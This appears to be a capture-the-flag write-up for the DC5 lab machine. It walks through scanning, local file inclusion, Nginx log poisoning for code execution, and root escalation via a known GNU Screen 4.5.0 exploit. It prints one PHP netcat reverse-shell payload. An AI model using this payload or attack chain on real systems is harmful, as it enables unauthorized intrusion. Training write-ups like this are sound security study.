DC5 Offensive Security Writeup



We launch nmap with scripts and software versions on all ports.


We access the website, review the source code and the different sections, but there is nothing interesting.

We reviewed the site again, specifically the “Contact” section. There we find a contact form, we fill it with arbitrary data and we see that it is sent by GET method.

If we reload the file without specifying the variable, we see that the copyright year is different, so it is very likely that the application is embedding files through variables (LFI?, Path traversal?).

We launch the Wfuzz tool with a medium dictionary, enumerate a new variable.

Yes, it is vulnerable to local file inclusion (LFI).

Previously, we saw in the headers that the server has an Nginx deployed, so we load the configuration file and get the paths where it stores logs.


Perfect, now we will do some tests to know the file that could help us to execute malicious code.

Testing Remote Code Execute (RCE)

Result testing Remote Code Execute (RCE)

Great, having clear in which file we can evidence code execution, let’s make a proof of concept that allows us to execute remote system commands.

PoC Log Poisoning + RCE

Result PoC Log Poisoning + RCE

Perfect! Well, we are not going to complicate and we are going to execute directly a reverse shell, but remember to put a netcat on the listen in our Kali.

We read the flag of user.txt.


<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f');?>

Request with reverse shell code

Result reverse shell code

Privilege Escalation

We ran some of our favorite recognition scripts (Ex. linpeas.sh) and listed a “Screen” in version 4.5.0.

This binary has a known exploit that would allow us to escalate root privileges: GNU Screen 4.5.0 - Local Privilege Escalation

In my case, I compiled the necessary files and hosted them on the victim. Once downloaded, I executed the following two commands to escalate privileges to root and read the proof.txt file.